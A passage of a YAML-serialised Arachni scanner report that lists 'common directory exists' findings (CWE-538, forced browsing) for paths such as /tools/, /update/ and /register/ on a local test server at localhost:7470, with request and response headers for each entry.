    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: devel
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/devel/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/development/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: development
    injected: development
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: development
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/development/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/tools/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: tools
    injected: tools
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: tools
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/tools/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/share/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: share
    injected: share
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: share
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/share/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/update/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: update
    injected: update
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: update
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/update/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/updates/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: updates
    injected: updates
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: updates
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/updates/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/util/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: util
    injected: util
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: util
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/util/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/utils/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: utils
    injected: utils
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: utils
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/utils/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/register/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: register
    injected: register
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: register
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/register/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/search/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: search
    injected: search
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: search
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/search/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/service/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: service
    injected: service
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: service
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/service/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/services/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: services
    injected: services
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: services
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/services/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/report/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: report
    injected: report
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: report
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/report/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/reports/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: reports
    injected: reports
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: reports
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/reports/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/purchase/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: purchase
    injected: purchase
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: purchase
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/purchase/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/retail/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: retail
    injected: retail
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: retail
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/retail/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/reseller/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: reseller
    injected: reseller
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: reseller
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/reseller/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/app/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: app
    injected: app
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: app
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/app/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/beta/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: beta
    injected: beta
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: beta
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/beta/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/boot/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: boot
    injected: boot
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: boot
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/boot/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/bug/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: bug
    injected: bug
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: bug
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/bug/
    variations: []

    verification: false
  verification: false
